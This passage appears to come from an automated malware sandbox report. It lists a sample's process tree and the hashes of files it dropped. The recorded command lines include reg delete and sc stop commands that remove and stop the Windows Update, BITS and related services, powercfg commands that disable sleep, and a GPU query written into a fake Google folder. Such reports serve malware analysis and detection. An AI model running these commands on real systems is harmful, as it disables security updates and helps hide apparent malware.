    cmdline: C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    - Executes dropped EXE
    PID: 7756
  [level 2] C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    cmdline: C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    PID: 9492

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
  PID: 576

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
  PID: 500

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
  PID: 348

[level 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID: 2660

[level 1] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 4264

[level 1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  PID: 3744

[level 1] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-dc 0
  PID: 4332

[level 1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  PID: 1892

[level 1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  PID: 944

[level 1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  PID: 3152

[level 1] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  PID: 2116

[level 1] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-ac 0
  PID: 3172

[level 1] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-dc 0
  PID: 3284

[level 1] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-ac 0
  PID: 1588

[level 1] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
  PID: 1124

[level 1] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
  PID: 4580

[level 1] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
  PID: 4960

[level 1] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID: 4664

[level 1] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
  PID: 4832

[level 1] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 4292

[level 1] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 4872

[level 1] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 3944

[level 1] C:\Windows\System32\Conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 2164

[level 1] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
  PID: 2488

[level 1] C:\Windows\system32\cmd.exe
  cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  - Drops file in Program Files directory
  PID: 3472
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 2.8MB
  MD5: eb27bb8cfa99d659e4fe023e9002ecd1
  SHA1: c783400302fdfae0518269c5a5a8d4bad29f42a3
  SHA256: 9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
  SHA512: ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

- Filesize: 2.8MB
  MD5: eb27bb8cfa99d659e4fe023e9002ecd1
  SHA1: c783400302fdfae0518269c5a5a8d4bad29f42a3
  SHA256: 9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
  SHA512: ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

- Filesize: 32KB
  MD5: f9b63cc697a7f1630a3cca64ec4d8808
  SHA1: 5001458414bb7311b290ae1d1b3b735b7ea3dfd6
  SHA256: 427b589a4b2b669e6f9c55314a910f8b227a52ba8f833955fdfc39d8cd62d4e1
  SHA512: 26bf710807fcb103df28ea2935c0b21042e36437e571f47fc5814df36eb31e645fbb922f04f0caf76999f5227f5e328f47a701128f6c03d5ee80a435e7e2de28

- Filesize: 12KB
  MD5: 799ec1d41d7d7c137e89905b10792c83
  SHA1: 2037f47e435b38e596dc59d940d66bc060a0b318
  SHA256: 3ec8628154c5560b3def67ee47d1b8b1fdd537d33221b7eb03c0c2edacdc61d7
  SHA512: 6ea57a3e84c284f75c8b7a3de40ca54a7a43c302e89720ecb5cf432e79bb555498a321b5c4a256c2336250f4c5c5f9ab165d20d58a77a9de12aeb9ebeb1f0a7f

- Filesize: 32KB
  MD5: 928aeda2bd398a5f1c3ef523387971b6
  SHA1: b24d637ef1f5cd8f1ebec475c69515b11f5745f1
  SHA256: d0dd4f24762e317ab0bdac3d79e8366a33a4c54caf51c727e891909eb1bda3bd
  SHA512: 6348952b207c10a43eddbaf0e2f930fb9766d81ad47507a9e2ad74096bba923746fccae20265d505431cdfe8101a3659e4f7abc757749f29409558ad744975e0

- Filesize: 12KB
  MD5: 986143cf8e0d4412b03e1d5222ae5e29
  SHA1: 4e2fc9c4ec29ad100ebdbee7b4b8fc3c01e1855b
  SHA256: f5b3231e961b3be9ad3b16164136775ad6f7257fbaabefaef81e225f9335137b
  SHA512: b87c18da3711618125d5fa4e9361a032244eedca46a3c329f6548db7dc7f750cdba2c6faeed9035c601e93221de078f0af4f7c04cf9874e8bf1bcfd5fcfbaf3a

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
  Filesize: 340B
  MD5: d78523f5ae674c1fb2312b44cc4517c7
  SHA1: 61689dca70d026ab29cf744326d2bf3dca6cdff7
  SHA256: f46c9dc1040b38753c96477300c030493233e748d310087a33a4a5af290ed82a
  SHA512: 9fa0d65aea38e862c16425187ce7b946996a687fe0c0368f6c41a45c805c05ed243765a4060e5f12d48f0fa3ec431f7d85b882d4d37f48b79aeb708e229b85ad

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
  Filesize: 438B
  MD5: 1ac2e43c6e92a5d87a1e37437b9ae778
  SHA1: 554fe05730968bf8c3bbaf5ba96bcf7a08eb56e4
  SHA256: fe8b10218444febdf67a47d9fc5b36dd96b5e85359c079ee2a98a75ae0f1d33b
  SHA512: 67bdbd1426c840643bafbedaa061c25aefb9e2401aafd675fe882d82fc743bc7de91a7364a7366dceb50683cada59bf1ee520dd0c38dd537899525cb8681c7ed

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_0ACA3509328F9CFAAE0993200F61CE00
  Filesize: 426B
  MD5: 88d50de80d978316d2aaf997f35a3e5d
  SHA1: 49cbba1432839a6670dc857b2af1c6fd0cabf5f4
  SHA256: 9b2e598b47df5ca36a5a99e9a9f94af73be2c8cbcdf2a21b4033e0874ed2f8f9
  SHA512: 18ecd3ec21c30afaf0036abc06b0c300407113936eac271169c8cd16271517aab80bff6c0379023c073b97dc8d1260dbd2e271782d3455c06a50adec66f059d6

- Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

- Filesize: 660B
  MD5: 6f8201778bb230fb0ac7c8b78a134a12
  SHA1: 06570db78997747dd80e558a483d29af167f43c5
  SHA256: 984fcdb20fcd38e921511def1e720e36c7a20887010f4f5035b0a6b24c75148f
  SHA512: 86ebbb74d94c382073f4481bb3a4c0747b801753adba15ee36c97dc8b09827e7a29b46209b559c1ab4fa836fbbe6a90b0339e97ed9d5d4856179604e380f2254

- Filesize: 45KB
  MD5: 0b5d94d20be9eecbaed3dddd04143f07
  SHA1: c677d0355f4cc7301075a554adc889bce502e15a
  SHA256: 3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c
  SHA512: 395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

- Filesize: 1KB
  MD5: 73b66cde181e28c021b1d4d7a36810bd
  SHA1: 12b02641e229d32fd06e5f19f3534aa102a84d48
  SHA256: 9891a6bc43eee6a64c36d2dcac60d0a948e75b26b0f58717d6fc37dd0b968e5e
  SHA512: ff70e4d3caa9e854237d4fb65958d24753cc8080985416d199ef3214f2c906462461f5067484f1fd81e4f1d82d259ca1824fb029b9f4a9653f04a504bd4b2bd6

- Filesize: 1KB
  MD5: 1a9a46bfe7fc0629560fe8a9d78b31a9
  SHA1: bc4a96a9be4fbaea828e1ea34b578fa87de52eda
  SHA256: 38032331e3336a397818955b6bff6fe5d4b81125d855e83ee5c665c0248ed0e1
  SHA512: 7b743cd4355bfe686b947f78e7d0fb47a31e71f22abd69daca9122640c869304517ab01e0c67e7a3653ab49156419e69d9ea574492408a7bb02558f0a94bffd3

- Filesize: 1KB
  MD5: 1a9a46bfe7fc0629560fe8a9d78b31a9
  SHA1: bc4a96a9be4fbaea828e1ea34b578fa87de52eda
  SHA256: 38032331e3336a397818955b6bff6fe5d4b81125d855e83ee5c665c0248ed0e1
  SHA512: 7b743cd4355bfe686b947f78e7d0fb47a31e71f22abd69daca9122640c869304517ab01e0c67e7a3653ab49156419e69d9ea574492408a7bb02558f0a94bffd3

- Filesize: 2.8MB
  MD5: 9253ed091d81e076a3037e12af3dc871
  SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
  SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
  SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

- Filesize: 2.8MB
  MD5: 9253ed091d81e076a3037e12af3dc871
  SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
  SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
  SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

- Filesize: 6.8MB
  MD5: 73b9004ff373f3b7b2f595541deb5a02
  SHA1: bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
  SHA256: b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
  SHA512: 908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

- Filesize: 6.8MB
  MD5: 73b9004ff373f3b7b2f595541deb5a02
  SHA1: bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
  SHA256: b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
  SHA512: 908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

- Filesize: 9KB
  MD5: a169fb1a323c970f7a169b30657112cc
  SHA1: 5347dc5c0fe604f8527e336dd09a522fef0af9db
  SHA256: 97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
  SHA512: 8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

- Filesize: 9KB
  MD5: a169fb1a323c970f7a169b30657112cc
  SHA1: 5347dc5c0fe604f8527e336dd09a522fef0af9db
  SHA256: 97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
  SHA512: 8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 9KB
  MD5: a169fb1a323c970f7a169b30657112cc
  SHA1: 5347dc5c0fe604f8527e336dd09a522fef0af9db
  SHA256: 97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
  SHA512: 8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

- Filesize: 9KB
  MD5: a169fb1a323c970f7a169b30657112cc
  SHA1: 5347dc5c0fe604f8527e336dd09a522fef0af9db
  SHA256: 97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
  SHA512: 8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 8KB
  MD5: d70f4f27040c6a58dd41ecc2546eebf5
  SHA1: d959ac175c8f75283b907309c518c026b21158c2
  SHA256: 3e41726d0ade4f37dd01cb7dd9368721f89222d0c3a083efedd583161cd285dc
  SHA512: d9574d37cf645490a3f36c9630cdd2074d7cbebd556b1a9fe0dfcb5afb3e17de7663c8c1c14c5992b911c2263214fd9fe14fca8deda9656acae9d0c9f4349f4c

- Filesize: 150KB
  MD5: 9a66a3de2589f7108426af37ab7f6b41
  SHA1: 12950d906ff703f3a1e0bd973fca2b433e5ab207
  SHA256: a913415626433d5d0f07d3ec4084a67ff6f5138c3c3f64e36dd0c1ae4c423c65
  SHA512: a4e81bffbfa4d3987a8c10cec5673fd0c8aecbb96104253731bfcab645090e631786ff7bde78607cbb2d242ee62051d41658059fcbbc4990c40dbb0fec66fcd6

- Filesize: 150KB
  MD5: 9a66a3de2589f7108426af37ab7f6b41
  SHA1: 12950d906ff703f3a1e0bd973fca2b433e5ab207
  SHA256: a913415626433d5d0f07d3ec4084a67ff6f5138c3c3f64e36dd0c1ae4c423c65
  SHA512: a4e81bffbfa4d3987a8c10cec5673fd0c8aecbb96104253731bfcab645090e631786ff7bde78607cbb2d242ee62051d41658059fcbbc4990c40dbb0fec66fcd6

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: ea6243fdb2bfcca2211884b0a21a0afc
  SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
  SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
  SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 065659124d9dd348476a53c4fb958bd6
  SHA1: f183b5807a73a8334168849911c2101265172098
  SHA256: 0d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d
  SHA512: b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: f8fee5ca5e2ac3c4bc1a56ad255c63af
  SHA1: 2a0f76d651ff5f793484d8b7fd621772ca8b6f9a
  SHA256: 6641c66acfa682d8de66d5e28e1c2b9112a57987660b93fc94ceb053fec834bd
  SHA512: 6f47bdfed52b2d07fba3724274bc9300fe5beb35a52a02b385ad9960e8a19d3a78363ddc5e90879991b7a3434c4a7675fb9d409385061fce30637db274dda48f